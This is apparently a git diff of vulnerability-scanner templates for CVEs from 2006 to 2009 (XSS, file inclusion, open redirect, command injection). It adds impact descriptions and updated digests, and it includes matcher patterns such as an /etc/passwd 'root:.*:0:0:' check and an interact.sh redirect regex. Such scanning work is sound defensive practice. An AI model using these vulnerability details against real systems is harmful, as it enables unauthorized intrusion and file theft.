+# digest: 4a0a0047304502207b167d92c80698ced12089ab60b5599c68ac644764fc7c498b54ba3b419645a7022100df03e54fcb0545995de5efa160937f4291cc667f1492d78e48ce8afcff374056:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml
index 0b474c8ba4..4e07c04fa4 100644
--- a/http/cves/2006/CVE-2006-1681.yaml
+++ b/http/cves/2006/CVE-2006-1681.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022033ff4b2d0618993f110bdcee1826f352569694a911159307a8f47963b4726556022038d273a79b3532c7f80935bec832c34c7892f005e3108ecc80ca91912b3eb12e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200a624286010449dfbca736566eca4b83ef242b54957df99d637e088e9f74d226022100df79ccce801ecbe05018cb6c9e29bc7f6acf5836a0f68bc4640d5c55a8fdbdbf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml
index ecc0901ff3..ddc0cd6633 100644
--- a/http/cves/2006/CVE-2006-2842.yaml
+++ b/http/cves/2006/CVE-2006-2842.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: high
   description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cf681f51c8fd7ad8f71ddb5ab7fbf70ab26af8ef9f4e1eecf899ef7e15a9cfc7022100fd0d57febf53d04624632cee41a8d0d9e2d2fccd8fb7fa76c099ec12679f4da0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022070351a9e8db3cd73242680b18ba040226de4685b2c47e1382a982513fb0fc4f6022100e11c42b749f6d407caa47bb25997db8749ff4658e5d89ccf2215774153751083:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml
index ce8f0cf862..0b75097769 100644
--- a/http/cves/2007/CVE-2007-4504.yaml
+++ b/http/cves/2007/CVE-2007-4504.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: |
     Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220712fc391a3e3be1f9f89f83c89ca00e016a1ae009e593ef7f256bc272a71792f022100eddfcc0868a4e91ff4b82eaa8fa52e5f192d150f48f12b868d02d656b1a5f363:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b096332d183a0234d0cbd3bfbc4b5149fddfbfe961ca49519ef85975a12413e50221008eee0c4a8fbdcd33a40800400dd5bd396f02ffb63cb375616260a0d10b0fce8d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml
index 5a9fa71597..04f66dce08 100644
--- a/http/cves/2007/CVE-2007-4556.yaml
+++ b/http/cves/2007/CVE-2007-4556.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
+  impact: |
+    Remote code execution
   remediation: |
     Update to the latest version of Apache Struts2
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022063c92b81235f315f81680c3e5e93dc814dfe125814e43dcb6cff373d90d06df2022100a730d9a5439ccba872f1932b6625658746e1dedae50d3d88b40a0e484f9399cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100efb00dfbe2fbe5543741c32ac6e81e36f307f5d67597644c0e036fb51692ea570220191deb545db561480334ffe98f010ae2ca82883fae8e71451c75675f56ee4501:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml
index 5ebb21682c..aa28240ef1 100644
--- a/http/cves/2007/CVE-2007-5728.yaml
+++ b/http/cves/2007/CVE-2007-5728.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ad3097a5f6494d45fc14b874469d62f42b9c84b273bc97b0688766f2d713b972022100e9ef7b1933fd6aa3ae8272f3d178f59cab4f4f5998bf9faaa1791557fec4245c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dc5ae294908867ea9cfb3d84402f9150ea3eba52581a1435594505653c59b4a902202749fa215a1e51172d887e6a52ca776e6530f8537f8df687fba7ed249836eb6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml
index b869d3db02..86cffe969a 100644
--- a/http/cves/2008/CVE-2008-1059.yaml
+++ b/http/cves/2008/CVE-2008-1059.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
   remediation: |
     Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100db5f69276d7187ac5e9ccd8fd496e438c208ccece891c346d8bde457e12843ed02204a3892717752fadf89f73626fb71fb105db24ea7b2a8f774024dc523cbaa3831:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202baf6dbc687b03d671808dd265b4bd483e0db5122a79101074736b0280a3b8a6022100fe1672451273fca5b4feda5dac2ed3961821928bc670fa6690bb5a5816910bd2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml
index 327215f351..0b16c19cce 100644
--- a/http/cves/2008/CVE-2008-1061.yaml
+++ b/http/cves/2008/CVE-2008-1061.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022009e0335783eef020014410f2e510ddaeb0729cbd858f61bd7142e3099b53a47e022064cfb538a41735c933bef0eec4be787cb021a3e82f3ed2904ecaecb8b3f60015:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d8a1715cd99d2a316fc96a49ad96d5fcb9e60d314fa0227f341da5c5964d63d1022034fc66ce4d2ff88c7bbaad9997d6a4da683cffe1a97d693b84d3918d4654d340:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml
index f7e977732c..182e4ff960 100644
--- a/http/cves/2008/CVE-2008-1547.yaml
+++ b/http/cves/2008/CVE-2008-1547.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.
+  impact: |
+    An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks.
   remediation: |
     Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server.
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a00483046022100ea8393f7c2fcb36e817067e028b4eb79d7da58d6cb3df979f437089ae9ec5b44022100b5b40586f3165ddb2cbf5e9678ec12ed29ef4c8039ab93e0a5b04f0aa31a595e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022042de3ed0e9fbe496c588f3edb67152006b98090716fbf000556dc8edaf836bf9022056dc3d31d210a950d8ddc0f728c2e9712fe5ec45775636b0fbb655b92a58e095:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml
index bd4476c962..eb2dd50f03 100644
--- a/http/cves/2008/CVE-2008-2398.yaml
+++ b/http/cves/2008/CVE-2008-2398.yaml
@@ -5,6 +5,8 @@ info:
   author: unstabl3
   severity: medium
   description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204c02560c678b8087c28bfeed200bf5f25dc9f74261527fa9d7a2fb3b146becf8022100dee5ed65d2accf8d9f2bd7d38d04efb7b5eb7e70f8a26b9ebb580f3c5279e580:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022042436195e99587054a6a10ee089470c1fadab498fe1b556fc0cdcde579d92d5602201b1af0719bba0f8007ca800e10004e6be93d7ec53b7ec4fe0f627c5372dcdca9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml
index 4a5a879c39..3dacac2ead 100644
--- a/http/cves/2008/CVE-2008-2650.yaml
+++ b/http/cves/2008/CVE-2008-2650.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203023e84e303b4688ad150f602ceea289a63ee29df8e12b9f39e6ebac23772d86022100f6e29101c5642afe45708838994bce4898278fe0adfb03b7b2124b7f0ceef30f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bbdf518966c75a44af19b519ed2a3d642aced2b7aaff600afa01c21c5509066f0221009c184332053f598d45bba3340388cadda4c7c8b8dabdb66884deea62912365b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml
index 686bb887ce..60ae910df7 100644
--- a/http/cves/2008/CVE-2008-4668.yaml
+++ b/http/cves/2008/CVE-2008-4668.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202feaa0d486d5070e9e7bfd4efd73233251cc5396a98dfc67390f6a5630c2e633022010d10fb2d53407cc4f72002217767dfdf8eef452f44b74b5fe6c27a5029e9c99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206851937b7e99292685636e8eef2e6b0b33d2b8d19446ba160013767d605e5fbb0220103e5f70323feb34b2b691f0e0fc3c7c89a457f0e351756ea16091a69d38e1c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml
index 11253a4d4e..2d59d570f4 100644
--- a/http/cves/2008/CVE-2008-5587.yaml
+++ b/http/cves/2008/CVE-2008-5587.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code.
   remediation: |
     Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022033f0c2315a611613fda0fb73c18a12113fa19156574aefbf477b092d512c58710221009494212e159047a9d4f26d0d900af8c3a6c04abb2086da29e47e858052513990:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ad5280aa6eac0929495f63d9882328a6c7dfd9bc0e135183d17a7c4cbc1e741e02203c987c6747a3bd616cd71adf3e491eeaee52d52f4dc1c2e0d5041d063956d83c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml
index 3a02907d51..2a1765763f 100644
--- a/http/cves/2008/CVE-2008-6080.yaml
+++ b/http/cves/2008/CVE-2008-6080.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: |
     Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c9a4ffd62555b868c4f74ccec0a683f901fce786056f157a2b745ae2d175c6c902200803e8831676633b7e4035222f60a624ca213872992d2bdf3e6024bc574be95a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e01b4968812ad7ad9b056cd634b2606c5650c02cf33012f5aef863b48bc969340220533ab0def58e9b6e81e56a8ae60e8116c2a03ef694aa21fc9601afd4798bce87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml
index af1feed620..bbac849887 100644
--- a/http/cves/2008/CVE-2008-6172.yaml
+++ b/http/cves/2008/CVE-2008-6172.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Update Joomla! Component RWCards to the latest version to mitigate the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210095f2553fda2f3bf455c5d6646d07cd536a1461506147b3d9f7c73b2c95aaa238022100cd50381518519c3903ec58739cca597e15d2f61c984c96e95876e26a79b860b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100aef3f723e04346fa7a2f8ac6c5abcf0174ca81a3aeb442367ae4d018f6ff964d0220337061d4274cc4456d6d13a49d5c1782ecb4b44cade9063e2389ffe246990c55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml
index 56eb5bedb9..529ec4dfe5 100644
--- a/http/cves/2008/CVE-2008-6222.yaml
+++ b/http/cves/2008/CVE-2008-6222.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e1afab8f9b7ea6d75940642627e9093d1248edb6b7f67043b5d83c2234eab0ea02206f00bafb8c8bdd919ddfde1f0d342b74d4d12749e255eca7e04072de4c509453:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fff4f0725abf21bcf55b6825cfd022b20b75e41e680ce18e4b08169f2923f78102210092bfa1840e5d2b94020d6226d2bbb157df2c1f344bef122db55ec8da3aba7044:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml
index ff0f77db1b..3b7a0f0c62 100644
--- a/http/cves/2008/CVE-2008-6465.yaml
+++ b/http/cves/2008/CVE-2008-6465.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b80eb05b64f804b1723e8d639c5985bc0aa09179c5f49be126abebb760da43db022100cda31ba602da0faee37f3838369448ee852a5c9a1b2c14cf70103dd503be9475:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202610c0f8d75d86e21ed6b2d7639a5f879540ed64700ccef63d61d5c49545056802200ccac5c2868b1a18b7542ad02343694a9839c8aa827db9bfde1ab7ba81d1844c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml
index 870d23297f..51f1f21cbc 100644
--- a/http/cves/2008/CVE-2008-6668.yaml
+++ b/http/cves/2008/CVE-2008-6668.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
   remediation: |
     Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100854eb0a19f68fd8f0c16b795237778394d481fedef431451051251d791f7e7d202203cc01a5cbd10885ed29bef8ebf64d830be1f221982512b569ffd9a9a79fdc8b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f317aa209617a0ac0f5b27dc38710858835641d5769cd8499709bad9cc17fa84022100b0cb6a925a432d6b22fd4ee7412c7fb438956de1fe797d92627665c8aee77a32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml
index d945879fc2..3fd4331563 100644
--- a/http/cves/2008/CVE-2008-6982.yaml
+++ b/http/cves/2008/CVE-2008-6982.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a0047304502201dea20a32ebb693d393be0d294a74bfb5b9eecb6827a8f58f157213a60428483022100e6ccfd9ff53c1724d243de900f9df24ec006a615484403dbdafa7537a3f0adca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022060c1d7a1d7f167f4a7725386e3770f50fc41cf720cfb3766a490be90bbfc632902207e45517728eabf9310ab9dc5a100c296a85431a2f94ce584aefb7d6c05833a1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml
index 35660774d8..159656a9ff 100644
--- a/http/cves/2009/CVE-2009-0347.yaml
+++ b/http/cves/2009/CVE-2009-0347.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
+  impact: |
+    An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.
   remediation: |
     Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a0047304502203ea8208e5f9c9a959ba132a829842ec16412e7e89e96459e772d992c1a0b419c022100bd66f70af78b54921981fa5210b7501871ae6c713617a56758b1f9b014f98e92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022051577f83aae8349027a0a3bfc2ed4386c0b9e1c09644dc0ddd098802e023c7e0022100e69fe1be6eeae6d3523eaf92aa776f94d0e42396edf72f348c0378ef7cd1da9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml
index b3d9db9a47..007940e9e3 100644
--- a/http/cves/2009/CVE-2009-0545.yaml
+++ b/http/cves/2009/CVE-2009-0545.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of ZeroShell.
   reference:
@@ -37,4 +39,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 490a0046304402203105e50de1b89b0165f438c48a50bd8a44fa30fe03592c5339c4a2949854804f02205fe7cbf331da5c49f1ac8be6ab55653b4358eb25d9be80a5c5df917c3cf205a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c159232e524cc33af61389e36bdf93790ac051100d465a44d101fed437d6d01902204c3f4b377b80d05a6d606971b970a5f55e7a05e99e48a7ded66295d9c1c523c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml
index d70da60c02..3da2192a79 100644
--- a/http/cves/2009/CVE-2009-0932.yaml
+++ b/http/cves/2009/CVE-2009-0932.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a48cabc5ed3721b402591d4860fd38d126b7e940ba2c6425733a7625ad7cabea0220690367ee6216c533f32eee62a5df670afffdd17227db036d876ae0a981872bdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100907faaad405c2236acd897cde184a91ef45ebbb033646c1c1e188b95abf7c2c202207c5a4151cd8bfbbf28ff42b726095b019cc0d25d4d1e2105313cc0a7cbd516a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml
index 3dcdf47ba4..646906dc75 100644
--- a/http/cves/2009/CVE-2009-1151.yaml
+++ b/http/cves/2009/CVE-2009-1151.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: high
   description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
   remediation: |
     Update PhpMyAdmin to the latest version or apply the necessary patches.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008e02fe97aa25d53673b25be320c0bb7d2c2f5de32b0479a6642d19caeac3176302204fbb68c73be955fb7ee136f5de9ba91f1183b932cd44a37339a3cb3629f682ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022072b55f94dd31deffee60f3cb3634845a62d55cb762cc7ff386cbb87e86628a46022100f409fca70224214acee88679b54a62d491ea8aa4097e70f6ae316fefbf08c8dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml
index 451e83adbc..6f335992fb 100644
--- a/http/cves/2009/CVE-2009-1496.yaml
+++ b/http/cves/2009/CVE-2009-1496.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
+  impact: |
